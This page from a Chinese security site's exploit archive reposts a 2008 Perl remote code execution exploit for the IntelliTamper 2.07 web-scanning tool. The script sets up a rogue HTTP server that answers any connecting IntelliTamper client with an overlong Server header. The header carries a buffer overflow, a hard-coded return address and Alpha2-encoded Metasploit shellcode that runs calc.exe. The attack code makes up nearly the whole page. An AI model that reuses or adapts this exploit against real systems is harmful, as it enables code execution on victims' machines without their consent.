首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IntelliTamper 2.07 (server header) Remote Code Execution Exploit
来源:www.vfcocus.net 作者:Koshi 发布时间:2008-07-23  
#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, thought i'd throw one in there.
# This example assumes you're scanning "http://127.0.0.1"
# For example, exploit may not work if you were to scan "http://127.0.0.1:80"
# or even changing it as slightly as "http://127.0.0.1/"
#
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny  ;) , BU,
# and finally, Guido Landi for sparking my interest in exploiting
# this application.
#
#

use IO::Socket;

my $msg="";
my $overflow = "A"x1536;
my $fun = "".
"\xb3\x8d\x95\x7c". # EIP (0x7C958DB3      call esp NTDLL.DLL)
"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer.
"AAAA2Cb3Cb4CBBBB"; # Starts executing here


# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $sh3llcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\x59\x59\x6c\x6a".
"\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\x75\x75\x6c\x4c".
"\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\x6b\x62\x6f\x36".
"\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\x79\x6e\x6b\x76".
"\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\x39\x4e\x4c\x6e".
"\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\x4d\x76\x61\x4f".
"\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\x44\x74\x35\x48".
"\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\x66\x6e\x6b\x64".
"\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\x6b\x4c\x4b\x37".
"\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\x74\x56\x64\x4f".
"\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\x70\x6f\x75\x49".
"\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\x6b\x30\x70\x45".
"\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\x49\x6e\x6b\x4b".
"\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\x78\x75\x6c\x51".
"\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\x78\x6c\x43\x6b".
"\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\x34\x43\x6f\x43".
"\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\x6f\x48\x67\x43".
"\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\x58\x71\x75\x37".
"\x70\x63";

my $overflow2 = "A"x1046;
my $buff = "$overflow$fun$sh3llcode";
my $resp = "".
"HTTP/1.1 200 OK\r\n".
"Connection: close\r\n".
"Content-Length: 8\r\n".
"Date: Mon, 21 Jul 2008 20:47:05 GMT\r\n".
"Content-Type: text/plain\r\n".
"Server: $buff\r\n".
"MIME-Version: 1.0\r\n\r\n".
"Exploit!\r\n";

my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, );


print "Listening on port 80 for connections...\n";
my $new_sock = $sock->accept();
print "Got connection from client...\n";
my $sock_addr = recv($new_sock,$msg,190,0);
print "Sending client packet...\n";
print $new_sock "$resp";
print "Packet sent to client, voila?\n";
close($sock);
print "Socket closed\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IntelliTamper 2.0.7 (html pars
·IntelliTamper 2.0.7 (html pars
·BIND 9.4.1-9.4.2 Remote DNS Ca
·Arctic Issue Tracker 2.0.0 (in
·Kaminsky DNS Cache Poisoning F
·MojoAuto (mojoAuto.cgi mojo) B
·MojoJobs (mojoJobs.cgi mojo) B
·BIND 9.x Remote DNS Cache Pois
·MojoPersonals (mojoClassified.
·Microsoft Access (Snapview.ocx
·MojoClassifieds 2.0 Remote Bli
·Wordpress Plugin Download Mana
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved